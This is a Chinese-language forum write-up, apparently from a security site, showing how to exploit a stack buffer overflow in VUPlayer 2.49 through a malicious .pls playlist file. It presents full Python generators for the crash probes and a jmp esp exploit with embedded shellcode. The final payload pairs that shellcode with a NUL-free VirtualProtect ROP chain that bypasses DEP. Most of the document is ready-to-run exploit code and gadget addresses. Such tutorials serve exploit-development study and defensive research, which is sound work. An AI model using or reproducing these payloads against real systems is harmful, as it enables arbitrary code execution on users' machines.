-
-
[原创]VUPlayer 2.49 - '.pls' Stack Buffer Overflow (Bypass DEP)
-
2017-3-12 11:52 3767
-
漏洞:https://www.exploit-db.com/exploits/40172/
VUPlayer 2.49 - '.pls' Stack Buffer Overflow
环境：VirtualBox 中的 Win7 企业版 + VUPlayer 2.49 + Immunity Debugger
运行软件，界面如下：
构造触发漏洞的文件：
#!/usr/bin/python
# First probe: a playlist that is nothing but 2000 'A' bytes.  The .pls
# parser copies the file contents into a stack buffer (see the strcpyA
# note in the writeup), so an oversized file is enough to crash it.
# Python 2 script: str is already bytes, and the payload is pure ASCII,
# so opening the file in text mode does not alter what is written.
import struct

PROBE_LENGTH = 2000
exploit = "A" * PROBE_LENGTH

with open('./exploit.pls', 'w') as file:
    file.write(exploit)
用 VUPlayer 播放 exploit.pls，触发漏洞：
定位覆盖 EIP 的位置：
#!/usr/bin/python
# Second probe: 1012 bytes of 'A' (0x41) followed by 1000 bytes of 'a'
# (0x61).  Because the two runs differ, the value left in EIP after the
# crash shows which part of the file reached the saved return address;
# 1012 is the offset the later payloads build on.
# Python 2 script (str is bytes); pure-ASCII payload, text mode is fine.
import struct

RETURN_ADDRESS_OFFSET = 1012
TAIL_LENGTH = 1000

exploit = "A" * RETURN_ADDRESS_OFFSET
exploit += "a" * TAIL_LENGTH

with open('./exploit.pls', 'w') as file:
    file.write(exploit)
找到触发漏洞的函数，跟进去：
``` 00455742 |. E8 59DBFFFF CALL VUPlayer.004532A0 ```
看到了 strcpyA：它不做长度检查，直接把文件内容复制到局部变量（栈缓冲区）中，于是造成栈溢出。
利用 jmp esp 跳到栈上执行 shellcode：
# Stage 2 of the writeup (DEP off): the saved return address at offset 1012
# is replaced by the address of a "jmp esp" gadget, so the function returns
# straight into the shellcode that follows it on the stack.
# Python 2 script: str is bytes here.  NOTE(review): on Python 3 the same
# text-mode write would transcode every byte >= 0x80 (e.g. the \x9f below)
# and the file would no longer contain the intended bytes.
import struct
# Position-independent payload as given in the writeup.  Judging from the
# ASCII it pushes/compares ("GetProcAddress", "LoadLibraryA", "user32.dll",
# "MessageBoxA", "ExitProcess", "shuz") it resolves its imports by walking
# the loader's module list, shows a message box and exits -- inferred from
# the embedded strings, not verified by execution here.
shellcode = "\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x31\xdb\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x89\xd6\x89\xcf\x31\xdb\x53\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x51\xff\xd2\x83\xc4\x10\x31\xc9\x68\x6c\x6c\x42\x42\x88\x4c\x24\x02\x68\x33\x32\x2e\x64\x68\x75\x73\x65\x72\x54\xff\xd0\x83\xc4\x0c\x31\xc9\x68\x6f\x78\x41\x42\x88\x4c\x24\x03\x68\x61\x67\x65\x42\x68\x4d\x65\x73\x73\x54\x50\xff\xd6\x83\xc4\x0c\x31\xd2\x31\xc9\x52\x68\x73\x68\x75\x7a\x8d\x14\x24\x51\x68\x73\x68\x75\x7a\x8d\x0c\x24\x31\xdb\x43\x53\x52\x51\x31\xdb\x53\xff\xd0\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x0c\x24\x51\x57\xff\xd6\x31\xc9\x51\xff\xd0";
# 0x1010539f little-endian: the "& jmp esp [BASSWMA.dll]" entry from the mona
# listing below.  An absolute address, so it is only valid while BASSWMA.dll
# loads at that fixed base.
jmp_esp = "\x9f\x53\x10\x10"
# 1012 bytes of filler reach the saved return address (see the probe above).
exploit = "A"*1012 + jmp_esp + shellcode
file = open('./exploit.pls','w')
file.write(exploit)
file.close()
在栈地址上执行 shellcode 成功。
接下来试试 ROP 的方式，用 mona 寻找 ROP 链。
目标（mona 给出的 VirtualProtect() 寄存器设置）：
``` Register setup for VirtualProtect() : -------------------------------------------- EAX = NOP (0x90909090) ECX = lpOldProtect (ptr to W address) EDX = NewProtect (0x40) EBX = dwSize ESP = lPAddress (automatic) EBP = ReturnTo (ptr to jmp esp) ESI = ptr to VirtualProtect() EDI = ROP NOP (RETN) ```
``` 0x004ffe6e, # POP ECX # RETN [VUPlayer.exe] 0x10109270, # ptr to &VirtualProtect() [IAT BASSWMA.dll] 0x004d7fe0, # MOV EAX,DWORD PTR DS:[ECX] # RETN [VUPlayer.exe] 0x10030950, # XCHG EAX,ESI # RETN [BASS.dll] 0x00442985, # POP EBP # RETN [VUPlayer.exe] 0x1010539f, # & jmp esp [BASSWMA.dll] 0x100110ff, # POP EBX # RETN [BASS.dll] 0x00000201, # 0x00000201-> ebx 0x1004041c, # POP EDX # RETN [BASS.dll] 0x00000040, # 0x00000040-> edx 0x004caccd, # POP ECX # RETN [VUPlayer.exe] 0x10108a2f, # &Writable location [BASSWMA.dll] 0x004ca628, # POP EDI # RETN [VUPlayer.exe] 0x1003a084, # RETN (ROP NOP) [BASS.dll] 0x10015f82, # POP EAX # RETN [BASS.dll] 0x90909090, # nop 0x1001d7a5, # PUSHAD # RETN [BASS.dll] ```
由于溢出是由字符串拷贝触发的，exploit 中不能出现 00 字节（拷贝会在第一个 NUL 处截断），因此需要调整 ROP 链，使其中不出现 00：
# VirtualProtect ROP chain rebuilt by hand from the mona output above so that
# no gadget address or constant contains a 0x00 byte (the overflow comes from
# a string copy, which stops at the first NUL).  Register targets follow
# mona's table: ESI = VirtualProtect, EBP = jmp esp, EBX = dwSize,
# EDX = NewProtect, ECX = lpOldProtect, EDI = ROP NOP, EAX = NOP; PUSHAD then
# lays the call frame out on the stack.  Every address is absolute
# (VUPlayer.exe / BASS.dll / BASSWMA.dll), so the chain only works while those
# modules load at their fixed bases.
rop_chain = "\x04\xD8\x01\x10"   # POP ESI # RETN
rop_chain += "\x5c\xe2\x60\x10"  #"\x70\x92\x10\x10" #ptr to &VirtualProtect()  (mona's IAT entry 0x10109270 left commented out; a different pointer is used)
rop_chain += "\xAE\x2E\x10\x10"  # MOV EAX,DWORD PTR DS:[ESI] # POP EBX # POP EDI # POP ESI # POP EBP # RETN 0x18  -> EAX = VirtualProtect
rop_chain += "\x90" * 16         # filler consumed by the four POPs above
rop_chain += "\x50\x09\x03\x10"  # XCHG EAX,ESI # RETN [BASS.dll]  -> ESI = VirtualProtect
rop_chain += "\x90" * 24         # filler skipped by the RETN 0x18
rop_chain += "\xAD\x59\x01\x10"  # POP EBP # RETN 0x08
rop_chain += "\x9F\x53\x10\x10"  # & jmp esp [BASSWMA.dll]  -> EBP (where VirtualProtect returns to)
rop_chain += "\x82\x5f\x01\x10"  # POP EAX ret
rop_chain += "\x90" * 8          # filler skipped by the RETN 0x08
rop_chain += "\xff\xfd\xff\xff"  # -0x201; NEG below turns it into 0x201 without a NUL byte in the file
rop_chain += "\xb4\x4d\x01\x10"  # NEG EAX # RETN
rop_chain += "\x72\x2f\x03\x10"  # XCHG EAX,EBX # RETN  -> EBX = 0x201 (dwSize)
rop_chain += "\x82\x5f\x01\x10"  # POP EAX ret
rop_chain += "\xc0\xff\xff\xff"  # -0x40; NEG below yields 0x40 (NewProtect, PAGE_EXECUTE_READWRITE) -- not 0x201 as the original comment said
rop_chain += "\xb4\x4d\x01\x10"  # NEG EAX # RETN
rop_chain += "\x6d\x8a\x03\x10"  # XCHG EAX,EDX # RETN  -> EDX = 0x40
rop_chain += "\x07\x10\x60\x10"  # POP ECX # RETN
rop_chain += "\x2f\x8a\x10\x10"  # &Writable location [BASSWMA.dll]  -> ECX (lpOldProtect)
rop_chain += "\x18\x62\x01\x10"  # POP EDI # RETN
rop_chain += "\x84\xA0\x03\x10"  # RETN [BASS.dll]  -> EDI (ROP NOP)
rop_chain += "\x82\x5f\x01\x10"  # POP EAX # RETN [BASS.dll]
rop_chain += "\x90"*4            # EAX = 0x90909090 (NOP)
rop_chain += "\xA5\xD7\x01\x10"  # PUSHAD # RETN
最终 payload：
#!/usr/bin/python
# Final payload (DEP bypass): 1012 bytes of filler, then the ROP chain whose
# first gadget address overwrites the saved return address, then the
# shellcode.  The chain calls VirtualProtect on the stack and returns into
# "jmp esp", which lands on the NOP bytes and the shellcode that follow.
# Python 2 script: str is bytes here.  NOTE(review): on Python 3 a text-mode
# write would transcode every byte >= 0x80 and corrupt the file contents.
import struct
# Same position-independent payload as in the jmp-esp version above.  From
# the ASCII it embeds ("GetProcAddress", "LoadLibraryA", "user32.dll",
# "MessageBoxA", "ExitProcess", "shuz") it appears to resolve its imports by
# walking the loader's module list, show a message box and exit -- inferred
# from the strings, not verified by execution here.
shellcode = "\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x31\xdb\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x89\xd6\x89\xcf\x31\xdb\x53\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x51\xff\xd2\x83\xc4\x10\x31\xc9\x68\x6c\x6c\x42\x42\x88\x4c\x24\x02\x68\x33\x32\x2e\x64\x68\x75\x73\x65\x72\x54\xff\xd0\x83\xc4\x0c\x31\xc9\x68\x6f\x78\x41\x42\x88\x4c\x24\x03\x68\x61\x67\x65\x42\x68\x4d\x65\x73\x73\x54\x50\xff\xd6\x83\xc4\x0c\x31\xd2\x31\xc9\x52\x68\x73\x68\x75\x7a\x8d\x14\x24\x51\x68\x73\x68\x75\x7a\x8d\x0c\x24\x31\xdb\x43\x53\x52\x51\x31\xdb\x53\xff\xd0\x31\xc9\x68\x65\x73\x73\x41\x88\x4c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x0c\x24\x51\x57\xff\xd6\x31\xc9\x51\xff\xd0";
# NUL-free VirtualProtect chain (see the annotated version above).  Register
# targets per mona's table: ESI = VirtualProtect, EBP = jmp esp, EBX = dwSize,
# EDX = NewProtect, ECX = lpOldProtect, EDI = ROP NOP, EAX = NOP.  All
# addresses are absolute, so the chain assumes VUPlayer.exe / BASS.dll /
# BASSWMA.dll load at their fixed bases.
rop_chain = "\x04\xD8\x01\x10"   # POP ESI # RETN
rop_chain += "\x5c\xe2\x60\x10"  #"\x70\x92\x10\x10" #ptr to &VirtualProtect()
rop_chain += "\xAE\x2E\x10\x10"  # MOV EAX,DWORD PTR DS:[ESI] # POP EBX # POP EDI # POP ESI # POP EBP # RETN 0x18  -> EAX = VirtualProtect
rop_chain += "\x90" * 16         # filler consumed by the four POPs above
rop_chain += "\x50\x09\x03\x10"  # XCHG EAX,ESI # RETN [BASS.dll]  -> ESI = VirtualProtect
rop_chain += "\x90" * 24         # filler skipped by the RETN 0x18
rop_chain += "\xAD\x59\x01\x10"  # POP EBP # RETN 0x08
rop_chain += "\x9F\x53\x10\x10"  # & jmp esp [BASSWMA.dll]  -> EBP
rop_chain += "\x82\x5f\x01\x10"  # POP EAX ret
rop_chain += "\x90" * 8          # filler skipped by the RETN 0x08
rop_chain += "\xff\xfd\xff\xff"  # -0x201; NEG below gives 0x201 without a NUL byte
rop_chain += "\xb4\x4d\x01\x10"  # NEG EAX # RETN
rop_chain += "\x72\x2f\x03\x10"  # XCHG EAX,EBX # RETN  -> EBX = 0x201 (dwSize)
rop_chain += "\x82\x5f\x01\x10"  # POP EAX ret
rop_chain += "\xc0\xff\xff\xff"  # -0x40; NEG below gives 0x40 (NewProtect) -- not 0x201 as the original comment said
rop_chain += "\xb4\x4d\x01\x10"  # NEG EAX # RETN
rop_chain += "\x6d\x8a\x03\x10"  # XCHG EAX,EDX # RETN  -> EDX = 0x40
rop_chain += "\x07\x10\x60\x10"  # POP ECX # RETN
rop_chain += "\x2f\x8a\x10\x10"  # &Writable location [BASSWMA.dll]  -> ECX (lpOldProtect)
rop_chain += "\x18\x62\x01\x10"  # POP EDI # RETN
rop_chain += "\x84\xA0\x03\x10"  # RETN (ROP NOP) [BASS.dll]  -> EDI
rop_chain += "\x82\x5f\x01\x10"  # POP EAX # RETN [BASS.dll]
rop_chain += "\x90"*4            # EAX = 0x90909090 (NOP)
rop_chain += "\xA5\xD7\x01\x10"  # PUSHAD # RETN
# 1012 bytes of filler reach the saved return address (see the probe above).
exploit = "A"*1012 + rop_chain + shellcode
file = open('./exploit.pls','w')
file.write(exploit)
file.close()